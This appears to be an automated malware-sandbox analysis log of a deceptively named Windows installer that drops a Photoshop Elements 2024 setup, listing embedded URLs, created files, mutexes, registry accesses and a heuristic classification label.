Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3755604634.00000000012CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://delegated.adobelogin.comity
Source: svchost.exe, 0000000E.00000003.1328046176.000001BDA3459000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 0000000E.00000003.1328046176.000001BDA3400000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: chromecache_240.18.drString found in binary or memory: https://github.com/WebReflection/url-search-params/blob/master/README.md#ios-10--other-platforms-bug
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpString found in binary or memory: https://ims-na1-stg1.adobelogin.com
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3762015475.0000000005C35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ims-na1-stg1.adobelogin.com/ims
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3775857049.000000000C8C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ims-na1-stg1.adobelogin.com/imsj.prod
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3763291568.0000000006250000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3758086632.0000000004710000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3763657703.0000000006F0E000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3765673238.0000000009867000.00000004.00000020.00020000.00000000.sdmp, HDInstaller.log.10.drString found in binary or memory: https://ims-na1.adobelogin.com/ims/authorize/v3?client_id=CC_HD_ESD_5_2&response_type=device&hashed_
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3765274666.0000000009700000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3755388883.0000000001250000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ims-na1.adobelogin.com/ims/authorize?client_id=CC_HD_ESD_WEB&amp;amp;scope=allow_ac_dt_excha
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3763050320.0000000006167000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3755388883.0000000001250000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3757122196.0000000003B03000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3757122196.0000000003B00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ims-na1.adobelogin.com/ims/authorize?client_id=CC_HD_ESD_WEB&amp;scope=allow_ac_dt_exchange%
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3765673238.0000000009867000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ims-na1.adobelogin.com/ims/authorize?client_id=CC_HD_ESD_WEB&scope=allow_ac_dt_exchange%2Cop
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3755604634.0000000001377000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpString found in binary or memory: https://ims-prod06.adobelogin.com
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3755604634.0000000001377000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ims-prod06.adobelogin.comcb
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3755604634.000000000132D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ims-prod07.adobelogin.com
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpString found in binary or memory: https://ims-prod07.adobelogin.comBaseUserProfilep8e-xo88uZdECZX33TmXbouglqWnMMEOY-gsf43446bc-7009-41
Source: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exeString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpString found in binary or memory: https://lcs-cops-dev.adobe.io
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpString found in binary or memory: https://lcs-cops-stage.adobe.io
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3755604634.000000000132D000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpString found in binary or memory: https://lcs-cops.adobe.io
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpString found in binary or memory: https://lcs-cops.adobe.iohttps://lcs-cops-stage.adobe.iohttps://lcs-cops-dev.adobe.iohttps://lcs-ule
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpString found in binary or memory: https://lcs-robs-dev.adobe.io
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpString found in binary or memory: https://lcs-robs-stage.adobe.io
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3755604634.000000000132D000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpString found in binary or memory: https://lcs-robs.adobe.io
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpString found in binary or memory: https://lcs-ulecs-dev.adobe.io
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpString found in binary or memory: https://lcs-ulecs-stage.adobe.io
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpString found in binary or memory: https://lcs-ulecs.adobe.io
Source: PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3765673238.00000000099B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: index.html0.10.dr, index.html.10.drString found in binary or memory: https://use.typekit.net/af/c2b3ac/0000000000000000000176ff/27/l?unicode=AAAIKgAAAAeBbOxmgCK-MdR34PEM
Source: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe, 00000000.00000003.1273556329.000000007FB40000.00000004.00001000.00020000.00000000.sdmp, Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe, 00000000.00000003.1272470718.0000000002550000.00000004.00001000.00020000.00000000.sdmp, Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000000.1274939932.0000000000401000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.innosetup.com/
Source: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe, 00000000.00000003.1273556329.000000007FB40000.00000004.00001000.00020000.00000000.sdmp, Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe, 00000000.00000003.1272470718.0000000002550000.00000004.00001000.00020000.00000000.sdmp, Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000000.1274939932.0000000000401000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.remobjects.com/ps

Spam, unwanted Advertisements and Ransom Demands

barindex
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeFile created: C:\Users\user\AppData\Local\Temp\{46C04F56-8A46-4F65-B643-07DB857C6418}\carousel.zip entropy: 7.99858557094Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeFile created: C:\Users\user\AppData\Local\Temp\{46C04F56-8A46-4F65-B643-07DB857C6418}\carousel\images\01_PSE2024_InstallerCarousel_ColorMatch_445x239.png entropy: 7.99417780661Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeFile created: C:\Users\user\AppData\Local\Temp\{46C04F56-8A46-4F65-B643-07DB857C6418}\carousel\images\02_PSE2024_InstallerCarousel_AddText_445x239.png entropy: 7.99439683967Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeFile created: C:\Users\user\AppData\Local\Temp\{46C04F56-8A46-4F65-B643-07DB857C6418}\carousel\images\03_PSE2024_InstallerCarousel_PhotoReels_445x239.png entropy: 7.99157413002Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeFile created: C:\Users\user\AppData\Local\Temp\{46C04F56-8A46-4F65-B643-07DB857C6418}\carousel\images\04_PSE2024_InstallerCarousel_OneClickSelection_445x239.png entropy: 7.99693279764Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeFile created: C:\Users\user\AppData\Local\Temp\{46C04F56-8A46-4F65-B643-07DB857C6418}\carousel\images\05_PSE2024_InstallerCarousel_CallOut_445x239.png entropy: 7.99404274865Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeFile created: C:\Users\user\AppData\Local\Temp\{46C04F56-8A46-4F65-B643-07DB857C6418}\carousel\images\05_PSE2024_InstallerCarousel_NewUI_445x239.png entropy: 7.99565416079Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeFile created: C:\Users\user\AppData\Local\Temp\{46C04F56-8A46-4F65-B643-07DB857C6418}\preserve\carousel\images\01_PSE2024_InstallerCarousel_ColorMatch_445x239.png entropy: 7.99417780661Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeFile created: C:\Users\user\AppData\Local\Temp\{46C04F56-8A46-4F65-B643-07DB857C6418}\preserve\carousel\images\02_PSE2024_InstallerCarousel_AddText_445x239.png entropy: 7.99439683967Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeFile created: C:\Users\user\AppData\Local\Temp\{46C04F56-8A46-4F65-B643-07DB857C6418}\preserve\carousel\images\03_PSE2024_InstallerCarousel_PhotoReels_445x239.png entropy: 7.99157413002Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeFile created: C:\Users\user\AppData\Local\Temp\{46C04F56-8A46-4F65-B643-07DB857C6418}\preserve\carousel\images\04_PSE2024_InstallerCarousel_OneClickSelection_445x239.png entropy: 7.99693279764Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeFile created: C:\Users\user\AppData\Local\Temp\{46C04F56-8A46-4F65-B643-07DB857C6418}\preserve\carousel\images\05_PSE2024_InstallerCarousel_CallOut_445x239.png entropy: 7.99404274865Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeFile created: C:\Users\user\AppData\Local\Temp\{46C04F56-8A46-4F65-B643-07DB857C6418}\preserve\carousel\images\05_PSE2024_InstallerCarousel_NewUI_445x239.png entropy: 7.99565416079Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeFile created: C:\ProgramData\Adobe\Installer\Icons\PSE_24.0\carousel\images\01_PSE2024_InstallerCarousel_ColorMatch_445x239.png entropy: 7.99417780661Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeFile created: C:\ProgramData\Adobe\Installer\Icons\PSE_24.0\carousel\images\02_PSE2024_InstallerCarousel_AddText_445x239.png entropy: 7.99439683967Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeFile created: C:\ProgramData\Adobe\Installer\Icons\PSE_24.0\carousel\images\03_PSE2024_InstallerCarousel_PhotoReels_445x239.png entropy: 7.99157413002Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeFile created: C:\ProgramData\Adobe\Installer\Icons\PSE_24.0\carousel\images\04_PSE2024_InstallerCarousel_OneClickSelection_445x239.png entropy: 7.99693279764Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeFile created: C:\ProgramData\Adobe\Installer\Icons\PSE_24.0\carousel\images\05_PSE2024_InstallerCarousel_CallOut_445x239.png entropy: 7.99404274865Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeFile created: C:\ProgramData\Adobe\Installer\Icons\PSE_24.0\carousel\images\05_PSE2024_InstallerCarousel_NewUI_445x239.png entropy: 7.99565416079Jump to dropped file
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\SystemTemp\chrome_BITS_8016_582987270\neifaoindggfcjicffkgpmnlppeffabd_1.0.2738.0_win64_kj4dp5kifwxbdodqls7e5nzhtm.crx3 (copy) entropy: 7.99758023731Jump to dropped file
Source: C:\Windows\System32\svchost.exeProcess Stats: CPU usage > 49%
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping8016_989246836
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping8016_989246836\sets.json
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping8016_989246836\manifest.json
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping8016_989246836\LICENSE
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping8016_989246836\_metadata\
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping8016_989246836\_metadata\verified_contents.json
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping8016_989246836\manifest.fingerprint
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping8016_1807591881
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping8016_1807591881\Google.Widevine.CDM.dll
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping8016_1807591881\manifest.json
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping8016_1807591881\_metadata\
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping8016_1807591881\_metadata\verified_contents.json
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping8016_1807591881\manifest.fingerprint
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping8016_767797103
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping8016_767797103\LICENSE.txt
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping8016_767797103\Filtering Rules
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping8016_767797103\manifest.json
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping8016_767797103\_metadata\
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping8016_767797103\_metadata\verified_contents.json
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping8016_767797103\manifest.fingerprint
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\chrome_BITS_8016_1388616622
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeCode function: 10_2_002E346010_2_002E3460
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeCode function: 10_2_002898A010_2_002898A0
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeCode function: 10_2_0020A8B010_2_0020A8B0
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeCode function: 10_2_0054252510_2_00542525
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeCode function: 10_2_0051F5F910_2_0051F5F9
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeCode function: 10_2_005442A810_2_005442A8
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeCode function: 10_2_005443C810_2_005443C8
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeCode function: 10_2_00540BCA10_2_00540BCA
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeCode function: 10_2_00287FC010_2_00287FC0
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeCode function: 10_2_005393B810_2_005393B8
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeCode function: 10_2_00526FA010_2_00526FA0
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeCode function: 15_2_0020A8B015_2_0020A8B0
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp 53E81F92037DE45F985ADA2D311B1BB075799ED674BE340A99829B54A8806193
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe BAFD3E50FCBC0CF95C718E9BCE72012991883908EC02B62806E0A6A451864483
Source: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exeStatic PE information: invalid certificate
Source: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: PhotoshopElements_2024_LS30_win64.exe.5.drStatic PE information: Resource name: DICTIONARY type: DOS executable (COM, 0x8C-variant)
Source: PhotoshopElements_2024_LS30_win64.exe.5.drStatic PE information: Resource name: DICTIONARY type: COM executable for DOS
Source: PhotoshopElements_2024_LS30_win64.exe0.5.drStatic PE information: Resource name: DICTIONARY type: DOS executable (COM, 0x8C-variant)
Source: PhotoshopElements_2024_LS30_win64.exe0.5.drStatic PE information: Resource name: DICTIONARY type: COM executable for DOS
Source: Google.Widevine.CDM.dll.17.drStatic PE information: Number of sections : 12 > 10
Source: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe, 00000000.00000000.1267199132.00000000004C6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameinstaller-build.exe vs Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe
Source: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe, 00000000.00000003.1337024834.00000000022A8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe
Source: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe, 00000000.00000003.1273556329.000000007FE26000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameinstaller-build.exe vs Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe
Source: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe, 00000000.00000003.1272470718.000000000263A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameinstaller-build.exe vs Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe
Source: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exeBinary or memory string: OriginalFileNameinstaller-build.exe vs Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe
Source: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: classification engineClassification label: mal52.rans.evad.winEXE@35/256@0/17
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeCode function: 10_2_003D24B0 CoInitializeEx,CoCreateInstance,CoSetProxyBlanket,VariantClear,SysStringLen,VariantClear,VariantClear,CoUninitialize,10_2_003D24B0
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpFile created: C:\Users\user\AppData\Local\ProgramsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{3EBE6875-9C4E-4782-8A43-275AFFFCA6FB}
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeMutant created: \Sessions\1\BaseNamedObjects\Global\17984755fe166b7170b9b5099053521c
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7200:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeMutant created: \Sessions\1\BaseNamedObjects\HDInstaller.log
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeMutant created: \Sessions\1\BaseNamedObjects\Global\359dca4322b8b4a0f7f92bf448150fb
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{D14718B7-BC31-4F09-9E3C-75D933967967}
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeMutant created: \Sessions\1\BaseNamedObjects\Global\_MSIExecute
Source: C:\Users\user\Desktop\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exeFile created: C:\Users\user~1\AppData\Local\Temp\is-35JO9.tmpJump to behavior
Source: C:\Users\user\Desktop\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: CREATE TABLE pcd_meta ( key TEXT NOT NULL, value TEXT NOT NULL, PRIMARY KEY (key) );
Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: INSERT INTO pcd_meta (key, value) VALUES ('schema_compatibility_version', 1);
Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: CREATE TABLE ribs_payload ( payloadID TEXT NOT NULL, productFamily TEXT NOT NULL, productName TEXT NOT NULL, version TEXT NOT NULL, PRIMARY KEY (payloadID) );
Source: PhotoshopElements_2024_LS30_win64.exe, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: CREATE TABLE payloads( PayloadID TEXT NOT NULL, productFamily TEXT ,productName TEXT , version TEXT , signature TEXT ,installState INT NOT NULL DEFAULT 0, installTime INT, PRIMARY KEY (PayloadID) );
